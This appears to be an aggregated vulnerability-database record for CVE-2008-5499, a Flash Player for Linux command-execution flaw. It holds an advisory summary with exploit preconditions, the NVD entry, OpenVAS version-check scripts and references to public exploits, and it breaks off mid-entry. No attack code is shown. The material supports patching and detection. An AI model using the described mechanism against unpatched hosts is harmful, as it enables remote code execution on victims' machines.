Adobe Flash Player is a cross-platform browser plug-in providing visual enhancements for web pages.
Problem
An input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method.
Resolution
Upgrade to Adobe Flash Player 10.0.15.3 or higher.
Exploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser.
The target host must have the Adobe AIR package installed.
The target host must have PERL installed.
Platforms
Linux
{"type": "saint", "edition": 2, "title": "Adobe Flash Player ActionScript launch command execution", "references": [], "published": "2008-01-07T00:00:00", "lastseen": "2019-05-29T17:19:55", "modified": "2008-01-07T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "viewCount": 5, "reporter": "SAINT Corporation", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5499"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231063554", "OPENVAS:63554", "OPENVAS:800087", "OPENVAS:850022", "OPENVAS:1361412562310800087"]}, {"type": "exploitdb", "idList": ["EDB-ID:18761"]}, {"type": "seebug", "idList": ["SSV:60075", "SSV:4580", "SSV:72802"]}, {"type": "suse", "idList": ["SUSE-SA:2008:059"]}, {"type": "saint", "idList": ["SAINT:82B8544AAE7DA47AB2B24B12A3DAC0AD", "SAINT:CB4CD425A2F03D26817AFADE0D8C3615"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/BROWSER/ADOBE_FLASHPLAYER_ASLAUNCH"]}, {"type": "nessus", "idList": ["SUSE_FLASH-PLAYER-5878.NASL", "GENTOO_GLSA-200903-23.NASL", "SUSE_11_0_FLASH-PLAYER-081218.NASL", "SUSE_FLASH-PLAYER-5877.NASL", "REDHAT-RHSA-2008-1047.NASL", "SUSE_11_1_FLASH-PLAYER-081218.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:1047"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112009"]}, {"type": "gentoo", "idList": ["GLSA-200903-23"]}], "modified": "2019-05-29T17:19:55", "rev": 2}, "score": {"value": 8.5, "vector": "NONE", "modified": "2019-05-29T17:19:55", "rev": 2}, "vulnersScore": 8.5}, "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. \n\n### Platforms\n\nLinux \n \n\n", "id": "SAINT:9E8C91C24922ECE29A3639F1B10A4936", "bulletinFamily": "exploit", "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:28:27", "description": "Unspecified vulnerability in Adobe Flash Player for Linux 10.0.12.36, and 9.0.151.0 and earlier, allows remote attackers to execute arbitrary code via a crafted SWF file.", "edition": 5, "cvss3": {}, "published": "2008-12-18T00:30:00", "title": "CVE-2008-5499", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5499"], "modified": "2017-08-08T01:33:00", "cpe": ["cpe:/a:adobe:flash_player_for_linux:9.0.48.0", "cpe:/a:adobe:flash_player_for_linux:10.0.12.36", "cpe:/a:adobe:flash_player_for_linux:9.0.115.0", "cpe:/a:adobe:flash_player_for_linux:9.0.151.0", "cpe:/a:adobe:flash_player_for_linux:9.0.31", "cpe:/a:adobe:flash_player_for_linux:9.0.124.0"], "id": "CVE-2008-5499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5499", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player_for_linux:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player_for_linux:10.0.12.36:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-12T11:19:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "Check for the Version of flash-player", "modified": "2017-12-08T00:00:00", "published": "2009-01-23T00:00:00", "id": "OPENVAS:850022", "href": "http://plugins.openvas.org/nasl.php?oid=850022", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2008:059", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2008_059.nasl 8050 2017-12-08 09:34:29Z santu $\n#\n# SuSE Update for flash-player SUSE-SA:2008:059\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"remote code execution\";\ntag_affected = \"flash-player on openSUSE 10.3, openSUSE 11.0, openSUSE 11.1, Novell Linux Desktop 9, SUSE Linux Enterprise Desktop 10 SP2\";\ntag_insight = \"The Adobe Flash Player was updated to fix an unspecified vulnerability\n that allowed attackers to take control of the victim's system by\n having the victim load a specially crafted SWF file, for instance\n embedded in a web page CVE-2008-5499.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850022);\n script_version(\"$Revision: 8050 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 10:34:29 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-23 16:44:26 +0100 (Fri, 23 Jan 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"SUSE-SA\", value: \"2008-059\");\n script_cve_id(\"CVE-2008-5499\");\n script_name( \"SuSE Update for flash-player SUSE-SA:2008:059\");\n\n script_summary(\"Check for the Version of flash-player\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"SLESDk10SP2\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.3\", rls:\"SLESDk10SP2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE10.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.1\", rls:\"openSUSE10.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~9.0.152.0~0.1\", rls:\"openSUSE11.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~10.0.15.3~1.1\", rls:\"openSUSE11.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-20T08:50:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.", "modified": "2017-07-05T00:00:00", "published": "2008-12-19T00:00:00", "id": "OPENVAS:800087", "href": "http://plugins.openvas.org/nasl.php?oid=800087", "type": "openvas", "title": "Adobe Flash Player for Linux SWF Processing Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_swf_proc_vuln.nasl 6539 2017-07-05 12:02:14Z cfischer $\n#\n# Adobe Flash Player for Linux SWF Processing Vulnerability\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful attack could result in execution of arbitrary code on the remote\n affected system.\n Impact Level: System\";\ntag_affected = \"Adobe Flash Player prior to 9.0.152.0/10.0.15.3 on Linux.\";\ntag_insight = \"The issue is due to the way Flash Player handles the SWF files.\";\ntag_solution = \"Upgrade to Adobe Flash Player 9.0.152.0 or 10.0.15.3,\n http://www.adobe.com/downloads\";\ntag_summary = \"This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.\";\n\nif(description)\n{\n script_id(800087);\n script_version(\"$Revision: 6539 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 14:02:14 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-12-19 13:40:09 +0100 (Fri, 19 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5499\");\n script_name(\"Adobe Flash Player for Linux SWF Processing Vulnerability\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/bulletins/apsb08-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nadobeVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!adobeVer){\n exit(0);\n}\n# Version match 9.0 to 9.0.151.0 and 10.0 to 10.0.12.36\nif(version_in_range(version:adobeVer, test_version:\"9.0\",\n test_version2:\"9.0.151.0\")){\n security_message(0);\n}\nelse if(version_in_range(version:adobeVer, test_version:\"10.0\",\n test_version2:\"10.0.12.36\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-29T22:26:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5499"], "description": "This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.", "modified": "2020-04-27T00:00:00", "published": "2008-12-19T00:00:00", "id": "OPENVAS:1361412562310800087", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800087", "type": "openvas", "title": "Adobe Flash Player for Linux SWF Processing Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player for Linux SWF Processing Vulnerability\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2008 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800087\");\n script_version(\"2020-04-27T11:04:25+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 11:04:25 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2008-12-19 13:40:09 +0100 (Fri, 19 Dec 2008)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-5499\");\n script_name(\"Adobe Flash Player for Linux SWF Processing Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb08-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2008 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful attack could result in execution of arbitrary code on the remote\n affected system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player prior to 9.0.152.0/10.0.15.3 on Linux.\");\n\n script_tag(name:\"insight\", value:\"The issue is due to the way Flash Player handles the SWF files.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player 9.0.152.0 or 10.0.15.3.\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Flash Player installed and is prone to\n Shockwave Flash (SWF) Processing vulnerabilities.\");\n\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nadobeVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nif(!adobeVer){\n exit(0);\n}\n# Version match 9.0 to 9.0.151.0 and 10.0 to 10.0.12.36\nif(version_in_range(version:adobeVer, test_version:\"9.0\",\n test_version2:\"9.0.151.0\")){\n report = report_fixed_ver(installed_version:adobeVer, vulnerable_range:\"9.0 - 9.0.151.0\");\n security_message(port: 0, data: report);\n}\nelse if(version_in_range(version:adobeVer, test_version:\"10.0\",\n test_version2:\"10.0.12.36\")){\n report = report_fixed_ver(installed_version:adobeVer, vulnerable_range:\"10.0 - 10.0.12.36\");\n security_message(port: 0, data: report);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:38:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-23.", "modified": "2018-04-06T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:136141256231063554", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-23 (netscape-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been identified, the worst of which allow\narbitrary code execution on a user's system via a malicious Flash file.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/netscape-flash-10.0.22.87'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=239543\nhttp://bugs.gentoo.org/show_bug.cgi?id=251496\nhttp://bugs.gentoo.org/show_bug.cgi?id=260264\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-23.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63554\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", \"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-23 (netscape-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/netscape-flash\", unaffected: make_list(\"ge 10.0.22.87\"), vulnerable: make_list(\"lt 10.0.22.87\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5362", "CVE-2009-0114", "CVE-2008-5361", "CVE-2009-0520", "CVE-2008-4824", "CVE-2008-5499", "CVE-2008-3873", "CVE-2008-5363", "CVE-2008-4823", "CVE-2008-4822", "CVE-2008-4818", "CVE-2008-4819", "CVE-2009-0519", "CVE-2008-4401", "CVE-2008-4503", "CVE-2009-0521", "CVE-2008-4821"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200903-23.", "modified": "2017-07-07T00:00:00", "published": "2009-03-13T00:00:00", "id": "OPENVAS:63554", "href": "http://plugins.openvas.org/nasl.php?oid=63554", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200903-23 (netscape-flash)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities have been identified, the worst of which allow\narbitrary code execution on a user's system via a malicious Flash file.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/netscape-flash-10.0.22.87'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200903-23\nhttp://bugs.gentoo.org/show_bug.cgi?id=239543\nhttp://bugs.gentoo.org/show_bug.cgi?id=251496\nhttp://bugs.gentoo.org/show_bug.cgi?id=260264\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200903-23.\";\n\n \n \n\nif(description)\n{\n script_id(63554);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-13 19:24:56 +0100 (Fri, 13 Mar 2009)\");\n script_cve_id(\"CVE-2008-3873\", \"CVE-2008-4401\", \"CVE-2008-4503\", \"CVE-2008-4818\", \"CVE-2008-4819\", \"CVE-2008-4821\", \"CVE-2008-4822\", \"CVE-2008-4823\", \"CVE-2008-4824\", \"CVE-2008-5361\", \"CVE-2008-5362\", \"CVE-2008-5363\", \"CVE-2008-5499\", \"CVE-2009-0114\", \"CVE-2009-0519\", \"CVE-2009-0520\", \"CVE-2009-0521\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200903-23 (netscape-flash)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/netscape-flash\", unaffected: make_list(\"ge 10.0.22.87\"), vulnerable: make_list(\"lt 10.0.22.87\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. \n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2008-01-07T00:00:00", "published": "2008-01-07T00:00:00", "id": "SAINT:82B8544AAE7DA47AB2B24B12A3DAC0AD", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "title": "Adobe Flash Player ActionScript launch command execution", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5499"], "description": "Added: 01/07/2008 \nCVE: [CVE-2008-5499](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5499>) \nBID: [32896](<http://www.securityfocus.com/bid/32896>) \nOSVDB: [50796](<http://www.osvdb.org/50796>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nAn input validation vulnerability allows command execution when the browser loads an SWF file which contains shell metacharacters in the arguments to the ActionScript launch method. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.0.15.3 or higher. \n\n### References\n\n<http://www.adobe.com/support/security/bulletins/apsb08-24.html> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.0.12.36 on Red Hat Enterprise Linux 5 and requires a user to load the exploit page in a browser. \n\nThe target host must have the Adobe AIR package installed. \n\nThe target host must have PERL installed. \n\n### Platforms\n\nLinux \n \n\n", "edition": 1, "modified": "2008-01-07T00:00:00", "published": "2008-01-07T00:00:00", "id": "SAINT:CB4CD425A2F03D26817AFADE0D8C3615", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_actionscript_launch", "type": "saint", "title": "Adobe Flash Player ActionScript launch command execution", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T10:24:17", "description": "Adobe Flash Player ActionScript Launch Command Execution Vulnerability. CVE-2008-5499. Remote exploit for linux 